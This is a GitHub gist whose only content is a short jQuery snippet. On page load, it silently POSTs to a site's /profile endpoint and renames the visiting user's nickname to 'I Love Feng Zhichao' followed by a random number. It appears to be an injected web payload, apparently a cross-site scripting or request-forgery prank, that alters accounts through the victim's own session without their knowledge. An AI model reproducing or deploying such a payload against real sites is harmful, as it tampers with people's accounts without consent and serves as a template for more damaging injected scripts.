Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@flanker
Last active December 12, 2015 00:08
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save flanker/4681574 to your computer and use it in GitHub Desktop.
Save flanker/4681574 to your computer and use it in GitHub Desktop.
$(function(){
var randomNum = Math.floor(Math.random() * 10000);
$.post("/profile",{'_method':'put','user[nick_name]':'I Love Feng Zhichao ' + randomNum});
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment